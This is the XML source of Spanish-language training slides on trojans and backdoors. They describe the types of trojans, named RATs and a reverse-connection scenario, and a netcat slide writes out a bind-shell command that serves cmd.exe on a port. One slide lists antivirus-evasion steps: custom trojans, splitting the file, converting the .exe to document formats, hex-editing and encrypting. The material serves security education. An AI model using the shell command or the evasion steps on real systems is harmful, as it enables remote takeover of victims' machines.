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6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>. Troyanos y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Backdoors</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176592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Desplegar un troyano</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Se crea el software troyano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. Se lo une en un archivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>wrapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>3. Se lo pone en el equipo de la víctima.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>4. Se instala</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>5. Víctima comprometida</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89910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Técnicas para evadir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>antivirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Nunca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>utilizar troyanos descargados desde la web (los antivirus pueden detectarlos fácilmente).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Dividir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>el archivo troyano en varias </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>piezas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>comprimirlas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>en un archivo simple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>SIEMPRE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>escribir sus propios troyanos e incrustarlo dentro de una aplicación.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Convertir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>el .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>vbscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Cambiar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>el contexto del troyano utilizando un editor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, revisar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>y cifrar el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>archivo.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396278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Tipos de troyanos</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Generalmente se los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>caracteriza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>por lo que hace, troyanos http, de comando, destructivos, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262847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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Estos troyanos proporcionan control remoto a través de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>línea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de comandos en el equipo de la maquina</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>El servidor troyano es instalado en la maquina virtual de la victima que abre un puerto para que se pueda conectar el atacante. El cliente se instala en el equipo del atacante que ejecuta un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> en el equipo de la víctima.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58589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Ejemplo con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>&gt; &lt;puerto&gt;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> -L -p &lt;puerto&gt; -t -e cmd.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66041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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Botnet</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Tiene como objetivo utilizar a las maquinas "secundarias" para atacar al objetivo principal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Illusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> BOT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>netbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102286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Proxy Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los atacantes usan los equipos de las victimas para conectarse a internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: W3bPrOxy Tr0j4nCr34t0r</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2573921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Instalan un servidor FTP en el equipo de la victima, el cual abre los puertos FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>TinyFTPD</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="1 Título"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Troyanos FTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370548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VNC </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Inicia un Servidor VNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>deamon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> en el sistema. Se puede conectar utilizando cualquier visor VNC. Se tiene acceso remoto total, escritorio, pantalla, mouse, teclado, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>WinVNC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, aunque no sea un troyano en sí, sirve para "controlar" a los empleados, "que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>están </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>haciendo"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196760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HTTP/HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Sirven para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>saltar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>los firewalls creando una conexión por los puertos 80 y 443, de esa manera se crea un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>"túnel". </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Se ejecutan en el host interno.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Ejemplo: HTTP RAT: Muestra datos, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>keystrokes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>, archivos, deshabilita programas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>floodea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>conexines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>a internet, distribuye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>, hace seguimiento de las actividades de navegación, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>jihackea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> el navegador, hace fraude, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Shttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>: Es un pequeño servidor http que puede ser incrustado en cualquier programa, por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>ej</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> (chess.exe) cuando este se ejecute el servidor web se ejecuta en segundo plano.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70561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Troyanos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Programa malicioso que se encuentra dentro de un programa aparentemente inofensivo que puede obtener acceso y causar daño.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Con la ayuda de un troyano un atacante puede obtener acceso a las contraseñas almacenadas en el equipo, también puede leer documentos personales, borrar archivos y mostrar imágenes y/o mostrar mensajes en la pantalla</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261329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ICMP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Esto se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>estudia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>precisamente para conocer que se puede crear troyanos de todo tipo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Ejemplo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>icmpsend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>old</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31574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de acceso remoto</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Trabaja como un acceso al escritorio. El hacker consigue un acceso GUI completo al sistema remoto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Ejemplo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. Se infecta el equipo con "server.exe" y planta un Reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Connecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2.- El troyano conecta el puerto 80 al atacante y establece una conexión reversa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>3.- El atacante tiene el control total sobre el equipo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Ejemplo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Beast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>, RAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>DarkComet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Apocalypse</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170253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Troyanos CCTT (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Covert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Tunneling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
